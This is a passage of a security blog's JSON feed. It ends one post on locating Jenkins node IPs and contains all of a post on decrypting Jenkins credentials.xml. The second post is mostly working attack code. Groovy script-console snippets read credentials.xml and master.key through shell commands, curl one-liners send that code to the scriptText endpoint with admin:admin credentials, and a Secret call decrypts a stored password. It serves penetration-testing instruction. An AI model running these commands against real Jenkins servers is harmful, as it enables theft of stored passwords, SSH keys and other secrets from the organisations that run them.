This request will require the \u003Cb\u003Eextended read \u003C\/b\u003Epermission.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s1600\/Screen+Shot+2019-03-04+at+9.14.23+PM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"636\" data-original-width=\"1600\" height=\"254\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s640\/Screen+Shot+2019-03-04+at+9.14.23+PM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EOptionally if you are on the box\u0026nbsp; or have a backup you can go to \u003Cspan style=\"font-family: Courier New, Courier, monospace;\"\u003Ejenkins-dir\/nodes\/$nodename\/config.xml\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: Courier New, Courier, monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: 
#444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cbr \/\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/8575904409576959407\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/8575904409576959407","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/8575904409576959407"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/03\/jenkins-identify-ip-addresses-of-nodes.html","title":"Jenkins - Identify IP Addresses of nodes"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEguSdi39W7IQVPRxn7K2eXB-ZnOy0NUQY9ojUe3_qbD31uOk6hZgft2dHwamo-OTP6q3w8YoiUgzVz2bO8LuoFlBtwh7-Akhw5oegYYLfwZry5z7_2IQLHIop65eCYi4hoedRXBm9gPvgI\/s72-c\/Screen+Shot+2019-03-04+at+9.14.23+PM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}},{"id":{"$t":"tag:blogger.com,1999:blog-8539880144347728238.post-7807981096117925435"},"published":{"$t":"2019-02-28T10:22:00.001-05:00"},"updated":{"$t":"2019-04-08T16:34:04.155-04:00"},"category":[{"scheme":"http://www.blogger.com/atom/ns#","term":"devops"},{"scheme":"http://www.blogger.com/atom/ns#","term":"jenkins"},{"scheme":"http://www.blogger.com/atom/ns#","term":"Pentesting"}],"title":{"type":"text","$t":"Jenkins - decrypting credentials.xml"},"content":{"type":"html","$t":"\u003Cspan style=\"color: 
#444444;\"\u003EIf you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehashed_pw='$PASSWORDHASH'\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Epasswd = hudson.util.Secret.decrypt(hashed_pw)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eprintln(passwd)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EYou need to perform this on the Jenkins system itself as it's using the local \u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Emaster.key\u003C\/span\u003E and\u0026nbsp;\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ehudson.util.Secret\u003C\/span\u003E\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EScreenshot below\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca
href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s1600\/Screen+Shot+2019-02-28+at+9.55.48+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"914\" data-original-width=\"1600\" height=\"364\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s640\/Screen+Shot+2019-02-28+at+9.55.48+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003ECode to get the credentials.xml from the script console\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EWindows\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cmd.exe \/c type credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , 
monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; $serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E*nix\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef sout = new StringBuffer(), serr = new StringBuffer()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Edef proc = 'cat credentials.xml'.execute()\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.consumeProcessOutput(sout, serr)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Eproc.waitForOrKill(1000)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cspan style=\"color: #444444;\"\u003Eprintln \"out\u0026gt; $sout err\u0026gt; 
$serr\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w\/s1600\/Screen+Shot+2019-02-28+at+10.02.18+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"840\" data-original-width=\"1566\" height=\"342\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgQIHvKbwhDc3MnTLBUNVpJpO-SYFTD9LzT4EI-9F32ceUTTmNFzasq3UhNcROCNsyoaj31MCCjfagBiz7AaA2niGeV67HrTq7Hx-jBX2myMapp9c3Lnafej497JkJy9T5TlaOmcDfAI6w\/s640\/Screen+Shot+2019-02-28+at+10.02.18+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you just want to do it with curl you can hit the scriptText endpoint and do something like this:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003E\u003Cbr \/\u003EWindows:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: 
#444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EAlso because this syntax took me a minute to figure out for files in subdirectories:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+\/c+type+\u003Cb\u003Es\u003C\/b\u003E\u003Cb\u003Eecrets%5C\\master.key\u003C\/b\u003E%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;times\u0026quot; , \u0026quot;times new roman\u0026quot; , serif;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: 
#444444;\"\u003E*nix:\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22\u0026amp;Submit=Run\"\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThen to decrypt any passwords (this works because the script console runs on the jenkins server itself, which holds the keys protecting credentials.xml, so script console access amounts to access to every stored secret):\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003Ecurl -u admin:admin http:\/\/10.0.0.160:8080\/scriptText --data \"script=println(hudson.util.Secret.fromString('7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=').getPlainText())\"\u003C\/span\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"color: #444444; font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca 
href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4\/s1600\/Screen+Shot+2019-02-28+at+10.04.59+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"111\" data-original-width=\"1600\" height=\"44\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgnJuSqASqUWdvE0oTGOlvRV3iDBonwuY0va3DMBKxzN1yaLRNUvcyWhN9lJWfWyuU53FzGI7uSKMZGp4wRofTjfpvUOgsr2Jfm-a_vD70VT1yLfSq4ezUewTEHrjZhmfFhK8AJOAAkfQ4\/s640\/Screen+Shot+2019-02-28+at+10.04.59+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cspan style=\"font-family: \u0026quot;courier new\u0026quot; , \u0026quot;courier\u0026quot; , monospace;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444; font-family: inherit;\"\u003EIf you are in a position where you have the files but no access to Jenkins, you can use:\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Ca href=\"https:\/\/github.com\/tweksteen\/jenkins-decrypt\" target=\"_blank\"\u003E\u003Cspan style=\"color: #444444;\"\u003Ehttps:\/\/github.com\/tweksteen\/jenkins-decrypt\u003C\/span\u003E\u003C\/a\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EThere is a small bug in the Python script where it applies the regex, and I haven't bothered to fix it as of this post. Here is a version where, instead of using the regex, I'm just printing out the values so you can see the decrypted password. 
The change is on line 55.\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cscript src=\"https:\/\/gist.github.com\/carnal0wnage\/80611a9c035046b2d400d90303355ff0.js\"\u003E\u003C\/script\u003E\n\n\u003Cbr \/\u003E\n\u003Cdiv class=\"separator\" style=\"clear: both; text-align: center;\"\u003E\n\u003Ca href=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ\/s1600\/Screen+Shot+2019-02-28+at+10.20.54+AM.png\" imageanchor=\"1\" style=\"margin-left: 1em; margin-right: 1em;\"\u003E\u003Cspan style=\"color: #444444;\"\u003E\u003Cimg border=\"0\" data-original-height=\"251\" data-original-width=\"1600\" height=\"100\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgLuVGgZLrxASVed0FYXj8PJ0a5qEfGetD3qgTAXTTJAdJ97B2zcq0qezPogtYE8vor3hbUSfK2vVIXL688vx5OFU6WX0cc0obWV5cZwUKsfKgWr3sxl427v4pQA1mxWFL2Lxx5O6OkeAQ\/s640\/Screen+Shot+2019-02-28+at+10.20.54+AM.png\" width=\"640\" \/\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\n\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 4 March 19: the script's regex only matches passwords (line 72), so you might need to swap out the regex if there are SSH keys or other secrets... read the credentials.xml file :-)\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Cbr \/\u003E\u003C\/span\u003E\n\u003Cspan style=\"color: #444444;\"\u003EEdit 8 April 19: This tweet outlines another similar way\u0026nbsp;\u0026nbsp;\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cspan style=\"color: #444444;\"\u003E\u003Ca href=\"https:\/\/twitter.com\/netmux\/status\/1115237815590236160\" target=\"_blank\"\u003Ehttps:\/\/twitter.com\/netmux\/status\/1115237815590236160\u003C\/a\u003E\u003C\/span\u003E\u003Cbr \/\u003E\n\u003Cstyle type=\"text\/css\"\u003E\np.p1 {margin: 
0.0px 0.0px 0.0px 0.0px; font: 13.0px Monaco; color: #f2f2f2; background-color: #000000}\nspan.s1 {font-variant-ligatures: no-common-ligatures}\n\u003C\/style\u003E"},"link":[{"rel":"replies","type":"application/atom+xml","href":"https:\/\/blog.carnal0wnage.com\/feeds\/7807981096117925435\/comments\/default","title":"Post Comments"},{"rel":"replies","type":"text/html","href":"https:\/\/www.blogger.com\/comment\/fullpage\/post\/8539880144347728238\/7807981096117925435","title":"0 Comments"},{"rel":"edit","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"self","type":"application/atom+xml","href":"https:\/\/www.blogger.com\/feeds\/8539880144347728238\/posts\/default\/7807981096117925435"},{"rel":"alternate","type":"text/html","href":"https:\/\/blog.carnal0wnage.com\/2019\/02\/jenkins-decrypting-credentialsxml.html","title":"Jenkins - decrypting credentials.xml"}],"author":[{"name":{"$t":"Unknown"},"email":{"$t":"noreply@blogger.com"},"gd$image":{"rel":"http://schemas.google.com/g/2005#thumbnail","width":"16","height":"16","src":"https:\/\/img1.blogblog.com\/img\/b16-rounded.gif"}}],"media$thumbnail":{"xmlns$media":"http://search.yahoo.com/mrss/","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhFkNV99_ybWbNJyDmwPMmSSXQjENMDnE36smHLghTMvOU7s0-NftJevAI7EIfcwPXTvMqT6jfMhLIQ6f_cfbOIBQRj6gTCTBTFayd1fXh36_LT4pMc5t2dXLmBi0PvrRX5yxbYfjF_6_Y\/s72-c\/Screen+Shot+2019-02-28+at+9.55.48+AM.png","height":"72","width":"72"},"thr$total":{"$t":"0"}}]}});